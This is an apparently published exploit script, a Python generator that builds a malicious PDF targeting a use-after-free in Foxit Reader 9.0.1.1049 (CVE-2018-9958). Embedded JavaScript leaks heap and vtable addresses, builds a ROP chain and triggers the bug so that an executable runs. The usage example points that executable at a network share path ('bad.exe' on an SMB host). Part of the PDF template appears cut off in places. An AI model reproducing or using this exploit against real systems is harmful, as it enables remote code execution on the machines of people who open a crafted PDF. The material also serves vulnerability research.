# Exploit Title: Foxit Reader 9.0.1.1049 - Arbitrary Code Execution # Date: August 29, 2020 # Exploit Author: CrossWire # Vendor Homepage: https://www.foxitsoftware.com/ # Software Link: https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&package_type=exe&language=English # Version: 9.0.1.1049 # Tested on: Microsoft Windows Server 2016 10.0.14393 # CVE : [2018-9958](https://nvd.nist.gov/vuln/detail/CVE-2018-9958) #!/usr/bin/python3 ''' =========================================================================== | PDF generator for Foxit Reader Remote Code Execution (CVE 2018-9958) | =========================================================================== | Written by: Kevin Dorland (CrossWire) | | Date: 08/29/2020 | | | | Exploit originally discovered by Steven Seeley (mr_me) of Source Incite | | | | References: | | https://www.exploit-db.com/exploits/44941 (Steven Seely Calc.exe PoC) | | https://www.exploit-db.com/exploits/45269 (Metasploit adaptation) | | | =========================================================================== ''' PDF_TEMPLATE = ''' %PDF 1 0 obj <> 2 0 obj < //End Path to executable rop[0x17] = 0x00000000; // adios, amigo } } function trigger_uaf(){ var that = this; var a = this.addAnnot({type:"Text", page: 0, name:"uaf"}); var arr = [1]; Object.defineProperties(arr,{ "0":{ get: function () { that.getAnnot(0, "uaf").destroy(); reclaim(); return 1; } } }); a.point = arr; } function main(){ leak_heap_chunk(); leak_vtable(); control_memory(); trigger_uaf(); } if (app.platform == "WIN"){ if (app.isFoxit == "Foxit Reader"){ if (app.appFoxitVersion == "9.0.1.1049"){ main(); } } } )>> trailer <> ''' import sys #Enforces 2 hex char byte notation. "0" becomes "0x00" def format_byte(b): if (len(b) > 2) and (b[0:2] == '0x'): b = b[2:] if len(b) == 1: b = '0' + b return '0x' + b def char2hex(c): return format_byte(hex(ord(c))) #Converts file path into array of eleven 32-bit hex words def path_to_machine_code(path,little_endian = True): print("[+] Encoding Path:",path) #ensure length if len(path) > 44: print("[CRITICAL] Path length greater than 44 characters (bytes). Aborting!") exit(-1) #Copy path into 4 character (32 bit) words (max 11) word_array = [] for i in range(11): word = '' if len(path): word += path[0:4] if len(path) >= 4 else path path = path[len(word):] if len(word) < 4: word += chr(0) * (4 - len(word)) word_array.append(word) #Convert chars to hex values and format to "0xAABBCCDD" notation hex_array = [] for word in word_array: #Reverse byte order to fit little endian standard if(little_endian): word = word[::-1] #Write bytes to hex strings hex_string = '0x' for char in word: hex_string += char2hex(char)[2:] #strip the 0x off the byte here hex_array.append(hex_string) return hex_array #writes encoded path to rop array to match template def create_rop(hex_arr, start_index = '0c'): ord_array = [] index = int(start_index,16) for instruction in hex_arr: full_instruction = f"\trop[{format_byte(hex(index))}] = {instruction};" ord_array.append(full_instruction) index += 1 return ('\n'.join(ord_array)) if __name__ == '__main__': if len(sys.argv) != 3: print(f"USAGE: {sys.argv[0]} ") print("-- EXAMPLES --") print(f"{sys.argv[0]} \\\\192.168.0.1\\exploits\\bad.exe evil.pdf") exit(-1) #Parse user args EXE_PATH = sys.argv[1] PDF_PATH = sys.argv[2] #Generate hex raw_hex = path_to_machine_code(EXE_PATH) print("[+] Machine Code:") for hex_word in raw_hex: print(hex_word) ord_string = create_rop(raw_hex) print("[+] Instructions to add:") print(ord_string) print("[+] Generating pdf...") print("\t- Filling template...") evil_pdf = PDF_TEMPLATE.replace('',ord_string) print("\t- Writing file...") with open(PDF_PATH,'w') as fd: fd.write(evil_pdf) print("[+] Generated pdf:",PDF_PATH)